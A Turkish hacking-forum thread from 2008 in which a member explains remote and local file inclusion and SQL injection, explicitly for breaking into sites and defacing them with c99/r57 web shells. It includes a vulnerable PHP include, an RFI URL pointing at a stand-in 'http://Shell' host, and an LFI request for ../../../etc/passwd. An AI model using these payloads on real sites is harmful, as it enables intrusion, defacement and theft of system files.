» Kullanıcı Arabirimi «

Üye Girişi Yapmadınız !
Kullanıcı Adı :

Şifre :

Beni Hatırla ?


» Site Ayrıntıları «


» HackTurkiye TeaM

O Şimdi AskerOn/Off
Neo
System RootDurum
DamaR
K@NUNSUZ
RootDurum
BLaDe
AdministratorDurum
TrayN
Co AdminDurum
CyBeRMaFia
İnspector AdminDurum
The_Sas
Team LeaderDurum
S1z0fR3N
Team ElemaniDurum
Neuromancer
Süper ModeratorDurum
K3zZaß
mali77
mariA
ModeratorDurum
darkpitQn
ReSpeCt
ßLacK~DéwiL

» Online Üyeler :«

» Shell «


» Reklam«

» Reklam«

 
Etiketler:

» Forum Kuralları «

1-) Büyük Harfle Yazı Yazmak Bağırmak Anlamına Gelmektedir..Bu Nedenle Sadece Cümle Baslarında KuLLanıLaBiLir..!
2-) Küfürler,Ahlaksız Sözler Kesinlile Yasaktır..! [Aksi Takdirde Banlanacaksınız..!
3-) Üyeleri Assalııcak Sözler Yasaktır...
4-) Yapılan Emek Kötü Dahi Olsa Önce Saygı Önce Teşekkür Sonra Eleştiri Lütfen Sağduyulu Olun..
Yazar Mesaj   #136021  2008-07-01 00:59 GMT  

SANAL_İNFAZ

HTT Üyesi
Gender_Bay Online Durum
Şehir:
Toplam Konu Yazmış
Toplam 494 Mesaj Yazmış
Şehir:
Ülke:
Meslek: HACKER
Yaş:


Selamun Aleyküm ;

Şimdi size çoğu sistemlere erişim için kullandığımız, scriptlerde mevcut olan ve büyük şirketlerin veritabanlarındaki açıklardan kısa ve öz bahsedicem.

Remote file inclusion açıkları ile sistemlere c99 veya r57 gibi benzer tarzı shell'ler upload edilerek sistemdeki diğer siteler kolayca deface edilebilmektedir.Bu tür acıkların meydana gelmesi coderlerin hatalarından meydana gelmektedir.Rfi uzaktan dosya okutmak anlamına gelmektedir.

include ve include_once php dosyasına dahil etme anlamını taşımaktadır.

Require ve require_once sayfaların kalan kodlarını yorumlar.

RFI açığı bulmada include,require,include_once,require_once, veriable gibi parametreler gerekir.

<?
include ($dark.’../config.php’) ;
?>

Kodumuzu sitemize attığımız zaman hata ile karşılaşacaktırız.bunun sayesinde sisteme shell sokabiliriz.

www.site.com/kod.php?dark=http://Shell

fakat kodumuz tanımlı olursa erişim yapamayız.

$dark: ‘files’; gibi.

Local file inclusion ise serverdan dosyayı okutmak demektir.Lfi rfi kadar sıklıkla kullanılmamaktadır ve tercih edilmemektedir.

<?
include (’files/$dark/config.php’) ;
?>

Koddaki dark tanımlı olmadığı için serverdan dosya okutabilirz,
ayrıca Rfi acıklarını Lfi olarakta kullabiliriz.

www.site.com/kod.php?dark=../../../etc/passwd

fakat $dark dosyamız tanımlı olursa Rfi Örneğinde verdiğim gibi;sistemden dosyayı okutamayız.

SQL ise veritabanlarında data çekme, silme ve değiştirme gibi işlemler için kullanılan basit yapılı bir dildir.Örneğin

DELETE FROM members WHERE id=dark

members tablosunda id si dark olan kayıdı silmek için kullanılan SQL cümlesidir.

SQL Injection ise web uygulamalarındaki en ciddi açıklardan birisidir.SQL Mantığını iyi kavrarsak büyük sistemlere kolayca erişim sağlayabiliriz.Kodların sorgulanmasının koruma altına alınmamamsı nedeni ile SQL açıkları meydana gelmektedir.SQL cümlecikleri oluşturulurken araya sıkıştırılan herhangi bir meta-krakter SQL Injectiona sebep olabilir.C temeli C#. php gibi dillerde backslash karakteri bir meta-karakteridir.Derleyici ve yorumlayıcılar bu krakterleri görünce sonrakileri ona göre işler.

Select deyimi SQL' da en çok kullanılan daha doğrusu kullanılması zorunlu olan temel bir komuttur.Bu komut ile veritabanından bize gerekli olan bilgileri alabiliriz.

Select * From uyeler;

Yukarıdaki komut ile üye tablosundaki tüm biligiler listelenecektir.Başka örneklere devam..

Select uye_adi,uye_soyadi From uyeler

Bu komutta uyeler tablosundaki uye_adi ve uye_soyadi bilgileri listeyecektir.

Biz bu komutlarımızda ilk önce Select deyimi ile seçme eylemini gerçekleştirdik, daha sonra ilk örnekte kullanımda yani * ile tüm colonları seçiceğimizi belirttik, sonrasında From ile tablo adı belirttik ve komutumuzu verdik listeleme işlemini gerçekleştirdik.Alttaki işlemde ise , kullanarak birden çok tablo bilgisi öğrenmeyi sağladık.

__________________
  

Yazar Mesaj   #136083  2008-07-01 03:37 GMT  

cndss

Kıdemli Üye
Gender_Bay Online Durum
Şehir: qimsenın qelemeyeceqı bı yer
Toplam Konu Yazmış
Toplam 395 Mesaj Yazmış
Şehir: qimsenın qelemeyeceqı bı yer
Ülke:
Meslek:
Yaş:


Aleykum Selam
saol paylasm ıcın

__________________
iletisim icin;

cndss@w.cn
cndss@hackturkiye.net



____________________________________
____________♥♥♥♥♥♥♥♥♥_______________
__________♥♥♥♥♥♥♥♥♥♥♥♥♥_____________
________♥♥♥♥♥_________♥♥______ ♥____
_______♥♥♥♥♥_________________♥♥♥♥___
_______♥♥♥♥♥______________♥♥♥♥♥♥♥♥♥♥
_______♥♥♥♥♥________________♥♥♥♥♥♥__
________♥♥♥♥♥_________♥♥___♥♥____♥♥_
__________♥♥♥♥♥♥♥♥♥♥♥♥♥_____________
____________♥♥♥♥♥♥♥♥♥_______________
____________________________________
  

Yazar Mesaj   #136097  2008-07-01 08:08 GMT  

B@LAXIS

Banlandı
Gender_Bay Online Durum
Şehir: ESki İsMim H@CKERDİ GERİ GELDİM
Toplam Konu Yazmış
Toplam 389 Mesaj Yazmış
Şehir: ESki İsMim H@CKERDİ GERİ GELDİM
Ülke:
Meslek: ESki İsMim H@CKERDİ GERİ GELDİM
Yaş:


ben verdim klit

__________________
rütbe istedim banlandım.
Visit user homepage   

 

RSS

Copyright? 06-07 HackTurkiye.CoM ݮc. All Rights Reserved
PSP , Sultanbeyli , Konteyner , Forum , Güvenlik
Made in Turkey
[ 38.103.63.18 İp Numaranız Kayıt Edildi ]
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] [27] [28] [29] [30] [31] [32] [33] [34] [35] [36] [37] [38] [39] [40] [41] [42] [43] [44] [45] [46] [47] [48] [49] [50] [51] [52] [53] [54] [55] [56] [57] [58] [59] [60] [61] [62] [63] [64] [65] [66] [67] [68] [69] [70] [71] [72] [73] [74] [75] [76] [77] [78] [79] [80] [81] [82] [83] [84] [85] [86] [87] [88] [89] [90] [91] [92] [93] [94] [95] [96] [97] [98] [99] [100] [101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111] [112] [113] [114] [115] [116] [117] [118] [119] [120] [121] [122] [123] [124] [125] [126] [127] [128] [129] [130] [131] [132] [133] [134] [135] [136] [137] [138] [139] [140] [141] [142] [143] [144] [145] [146] [147] [148] [149] [150] [151] [152] [153] [154] [155] [156] [157] [158] [159] [160] [161] [162] [163] [164]

Anti Pkk , Domain Hack , Email Hack , Flood Ddos , Ftp Hack , Hack , Hack Sitesi , Hacker , Hack Prgoramları , Ldu Ve Seditio Hack ,MSn Hack , Nuke Hack , Web Hack , CuteNewsHack , vBulletin Hack , Phpbb Hack , Smf Hack , Joomla Hack , MkPortal Hack , Vb Hack , phpBB3 Hack , MyBB Hack , XOOPS Hack , WordPress Hack , UseBB Hack , Heck , hack+hacker